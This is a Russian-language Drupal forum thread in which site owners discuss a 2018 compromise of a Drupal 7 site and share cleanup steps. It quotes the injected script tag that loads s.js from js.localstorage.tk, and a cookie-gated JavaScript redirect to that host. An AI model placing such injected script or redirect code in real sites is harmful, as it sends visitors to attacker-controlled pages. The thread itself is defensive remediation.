19 апреля 2018 в 21:35
Добрый день.
Ломанули сайт на D7.
Полностью был не аллё.
Нашел вроде все сторонние файлы, удалил.
Вроде заработал.
Но например при первом заходе на сайт через Google Chrome, редиректит на какую то чебурду. При 2 заходе - все ок.
Так же при заходе через Оперу, через телефон Сафари, Яндекс браузер. т.е. при 1 заходе - редирект, второй заход норм.
В какой файл еще можно поглядеть где этот редирект?
20 апреля 2018 в 12:17
Я делал так:
1. Удалил полностью drupal с хостинга.
2. Восстановил из бекапа тему сайта.
3. Слил БД, почистил "автозаменой" все левые добавленные скрипты (по всей базе).
Для примера:
<script type="text/javascript" src="https://js.localstorage.tk/s.js?qr=888"></script>
Залил БД обратно.
4. Скачал новый дистр Drupal с сайта. Закачал на хостинг.
5. Удалил левых пользователей и их привилегии.
6. Заменил пароль к FTP и MySql.
7. Проверил сайт различными сервисами (online-сканирование на наличие зловредов).
ЗЫ. Ломанули эти:
Если что - могу помочь. Обращайся в личку. Удачи!
Содержимое сайта публикуется на условиях CreativeCommons Attribution-ShareAlike 3.0 или более поздней версии. Программные коды в тексте статей — на условиях GNU GPL v2 или более поздней версии.
Документация по совместной работе с репозиторием drupal.ru – https://docs.drupal.ru/code
Drupal – торговая марка Дриса Бёйтарта
Поддерживать инфраструктуру Drupal.ru нам помогает компания ДАЛЕЕ
Комментарии
html.tpl.php врезка script
ага. вон чего там http://joxi.ru/YmEnMvPS083vy2
Как эти членососы пробрались? FTP получается сломали?
Обновлять ядро.
Аудитить изменения в базе и коде.
Пересмотреть юзеров.
Панацеи нет, надо было обновляться вовремя
Уже начал
Что это за херомантия?
function tryToAppend(){
if (document.cookie.indexOf("qwerty33=") >= 0) {
} else {
st();
var ul = "https://js.localstorage.tk/r.php";
document.location.href = ul;
window.location.href = ul;
}
if(!document.body){
return setTimeout(tryToAppend(),1);
}
counter();
}
function st(){ var now = new Date();now.setTime(now.getTime() + 1 * 3600 * 1000 * 12);document.cookie = "qwerty33=1; expires=" + now.toUTCString() + "; path=/";}
Вроде указывает на файл s.js ....найти ни как не могу
Этого в друпале нет
Если нужна будет помощь, пишите в личку
Вчера все обновил. А сегодня снова вирусные файлы (index.php) были залиты по разным папкам....
Я не пойму, чтобы закинуть файлы на ftp нужен доступ, все пароли сменил.
Или где то лежит файл который в первый раз был залит на хостинг и теперь создает остальные...
Люди есть идеи?
https://drupal.ru/node/136662
Ознакомьтесь с топиком, особенно с последними моими ответами
Обновить мало. Нужно всё вычистить. Из файлов и из базы
В таблицах типа node? или где угодно?
Снести всё, восстановить бэкап, обновиться.
Я делал так:
1. Удалил полностью drupal с хостинга.
2. Восстановил из бекапа тему сайта.
3. Слил БД, почистил "автозаменой" все левые добавленные скрипты (по всей базе).
Для примера:
<script type="text/javascript" src="https://js.localstorage.tk/s.js?qr=888"></script>Залил БД обратно.
4. Скачал новый дистр Drupal с сайта. Закачал на хостинг.
5. Удалил левых пользователей и их привилегии.
6. Заменил пароль к FTP и MySql.
7. Проверил сайт различными сервисами (online-сканирование на наличие зловредов).
ЗЫ. Ломанули эти:
Если что - могу помочь. Обращайся в личку. Удачи!
Батюшки!
Почти RxB!
Спасибо. Вроде победил. Долго искал
<script type="text/javascript" src="https://js.localstorage.tk/s.js?qr=888"></script>а он ссюка в нодах сидел
Да, забыл сказать. На хостинге можно выполнить поиск по дате изменения файла. У меня некоторые файлы были 1970 г., а некоторые - 18.04.2018 (дата взлома). Эти файлы пристально просмотреть, либо заменить их из бекапа